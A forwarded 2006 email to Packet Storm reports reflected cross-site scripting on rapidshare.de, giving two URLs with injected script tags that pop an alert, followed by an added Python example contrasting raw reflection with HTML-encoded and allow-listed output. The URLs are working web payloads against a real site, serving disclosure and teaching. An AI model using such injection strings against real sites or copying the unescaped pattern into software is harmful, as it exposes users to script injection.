----- Forwarded message from "Giel S." -----

Date: Mon, 13 Mar 2006 19:13:11 +0100
From: "Giel S."
To: staff@packetstormsecurity.org
Subject: Rapidshare XSS

Hi,

I've discovered a (new) Rapidshare.de cross site scripting attack:

http://rapidshare.de/?uri=/files/11707529%2%3Cscript%3Ealert%28%22Another%20XSS%20in%20rapidshare%2C%20found%20by%20Ironfist%22%29%3B%3C/script%3E&dl.start=Free

http://rapidshare.de/?uri=%2Ffiles%2F15307201%2F%3Cscript%3Ealert(%22Premium%20zone%20also%20not%20secure%22);%3C/script%3E&dl.start=PREMIUM

Maybe an idea for the advisory section?

Greetings,
Ironfist

----- End forwarded message -----
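
Added example, not part of the forwarded message and not Rapidshare's code: it decodes the `uri` parameter from the second reported URL and contrasts a page that reflects it raw with one that HTML-encodes it and one that also allow-lists it. The page template, the `/files/<id>/<name>` pattern and all function names are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Second URL from the report above, used only as parser input.
REPORTED_URL = ("http://rapidshare.de/?uri=%2Ffiles%2F15307201%2F%3Cscript%3Ealert"
                "(%22Premium%20zone%20also%20not%20secure%22);%3C/script%3E"
                "&dl.start=PREMIUM")

# Assumed shape of a legitimate value: /files/<numeric id>/<file name>
SAFE_URI = re.compile(r"/files/\d{1,12}/[A-Za-z0-9._-]{1,255}")
INVALID = "<p>Invalid file reference.</p>"


def get_uri(url):
    """Return the percent-decoded `uri` query parameter ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("uri", [""])[0]


def render_unsafe(uri):
    """Vulnerable pattern: decoded input concatenated straight into markup."""
    return "<p>Requested file: <b>" + uri + "</b></p>"


def render_encoded(uri):
    """Output encoding: <, >, &, and quotes become entities, so the
    browser shows the value as text instead of parsing it as markup."""
    return "<p>Requested file: <b>" + html.escape(uri, quote=True) + "</b></p>"


def render_safe(uri):
    """Defence in depth: reject anything outside the expected shape,
    then still encode on output."""
    if not SAFE_URI.fullmatch(uri):
        return INVALID
    return render_encoded(uri)


if __name__ == "__main__":
    value = get_uri(REPORTED_URL)
    print("decoded :", value)
    print("unsafe  :", render_unsafe(value))
    print("encoded :", render_encoded(value))
    print("safe    :", render_safe(value))
    print("legit   :", render_safe("/files/15307201/report.zip"))
```
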